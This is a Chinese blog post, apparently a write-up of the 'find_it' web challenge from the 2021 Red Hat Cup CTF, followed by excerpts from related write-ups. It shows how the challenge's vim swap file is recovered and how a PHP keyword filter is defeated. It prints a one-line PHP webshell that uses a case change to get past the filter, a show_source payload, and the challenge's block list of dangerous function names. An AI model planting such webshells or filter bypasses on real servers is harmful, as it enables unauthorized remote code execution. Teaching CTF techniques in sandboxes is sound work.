2021-第四届红帽杯网络安全大赛-Web-find_it

最新推荐文章于 2023-06-15 22:31:54 发布
最新推荐文章于 2023-06-15 22:31:54 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: CTFHUB 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40872714/article/details/123764124
版权

2021-第四届红帽杯网络安全大赛-Web-find_it

题目
在这里插入图片描述
先用目录扫描工具爆破一下目录,发现了robots.txt
在这里插入图片描述
访问后有了提示 1ndexx.php
在这里插入图片描述
直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。
在这里插入图片描述

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

在这里插入图片描述
把关键代码粘贴出来看一下运行流程

  • 打开flag.php读取文件内容

  • 打开hack.php文件,获取code参数

  • 正则匹配危险函数

  • 字符串长度不能超过33

  • 将code参数的内容写入hack.php

  • 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

利用方式1:大小写过滤,利用Eval绕过eval限制,成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E
使用菜刀工具连接hack.php
在这里插入图片描述
利用方式2:利用show_source高亮代码,再看代码的时候注意到flag.php里的内容会被写入到hack.php中,这样只需要高亮自己就可以看到flag了。
http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E
不过这种方式我没有成功

参考:
https://www.jianshu.com/p/e17bf9e64e18

swpu_jx_1998
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021第四届红帽杯网络安全大赛-线上赛Writeup
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9951
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
红帽杯2021web Find_it
qq_52671379的博客
06-14 322
Find_it 打开题目链接并没有任何收获 然后想想有无备份文件 最后通过dirsearch.py扫描发现robots.txt 发现存在1ndexx.php,直接访问并没有什么信息。 同样的猜测是否存在备份文件 常见的备份文件后扩展名有 .git .svn .swp .~ .bak .bash_history .svn 最后查看.swp备份文件得到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 916
小小记录一下
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
09-20
第三届“红帽杯网络安全攻防大赛总决赛落幕.pdf
18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-18
18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18--[小红帽].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码18...
rhel-baseos-9.0-beta-0-x86_64-dvd.iso.rar
04-12
标题中的"rhel-baseos-9.0-beta-0-x86_64-dvd.iso.rar"揭示了我们要讨论的核心内容:Red Hat Enterprise Linux(RHEL)的第9.0版本的BaseOS(基础操作系统)镜像文件。这个版本处于Beta测试阶段,目标平台为64位x86...
fabric8-analytics-vscode-extension:红帽依赖性分析扩展
04-01
标记安全漏洞(CVE)并建议补救版本 显示Github受欢迎程度指标以及最新版本 建议项目级别的许可证,检查依赖项许可证之间是否存在冲突 基于AI的其他替代依赖指南 支持的语言 “依赖关系分析”扩展支持使用Maven的...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
FindIT2DarwinCore-开源
04-28
该程序旨在提取存储在网址上的PDF文档中的科学名称,然后将数据输入Darwincore格式的表格中。 此外,该应用程序还使用位于http://www.ubio.org的“ FindIT” Web服务。
BuuCTF [2019红帽杯]easyRE
m0_74154467的博客
06-15 358
Buuctf解题思路
记录findIt 2011安装教程(解决时间限制问题)
热门推荐
weixin_43872274的博客
10-03 2万+
双击进入FindIt 2011安装包 点击Launch应用程序进行安装 点击Install FindIt!! 单击Next 选择I accept,并单击Next。 在Findit安装包中找到Licence Key文件,把其中内容拷贝到对话框中,并单击Next 默认选择Complete,并单击Next 单击Install 单击Finish,安装完成 桌面出现FindIt的快捷方式,......
红帽杯2021_web_部分
ScyLamb的博客
05-10 1264
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
2017广东省红帽杯网络安全攻防大赛writeup
Ni9htMar3的博客
05-07 1万+
签到 brian(Y) WEB 刮刮乐 PHPMyWIND 后台 thinkseeker PWN pwn1 pwn2 pwn4 pwn5
2021 红帽杯 pwn parser
yongbaoii的博客
05-11 466
不出意外的全绿。 主函数循环读。 这个地方有个陌生的函数,alloca。 C 语言里有一个 alloca 函数,可以在堆栈上分配一块内存,当前函数退出时,由于系统堆栈指针的调整,这块内存会被自动回收。 alloca 的函数原型是 void * alloca(size_t size); 它的汇编代码很简单,就两句 sub esp,eax mov rax,rsp 他做的就是在栈上开空间,esp减长度,然后地址放在eax中。 alloca中的算式作用是让你的输入的长度对齐,对齐到16字节,.
2021 CVVD首届车联网漏洞挖掘赛线上初赛 Writeup
SkYe's Blog
05-09 2690
jwt 原题 https://blog.csdn.net/weixin_46676743/article/details/113726655 带着 Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImVicmVidW5hIiwicGFzc3dvcmQiOiIiLCJhZG1pbiI6ImdlaHIiLCJpYXQiOjE2MjA0NTgwMzJ9.QkpCPfCtmMmeEYRoLFzzT8ag7mIaIPIcbZLZAB
第二届红帽杯线上初赛 RedHat 2018 WriteUp
郁离歌丶的博客
05-02 5689
又是一个划水的比赛,作看高中生吊打全场orz,太强了。WEBsimple upload进入一个登陆页面,抓包之后发现cookie有admin=0改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg&lt;% if("023".equals(request.getParameter("pwd"))){ ...
红帽7.6出现minimal+bash-like+line
最新发布
12-15
根据提供的引用[1],我们可以得知Linux...4.注销并重新登录到系统中,然后再次运行以下命令来检查默认shell是否已更改: ```shell echo $SHELL ``` 如果输出结果是/bin/bash,则说明默认shell已成功更改为bash shell。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值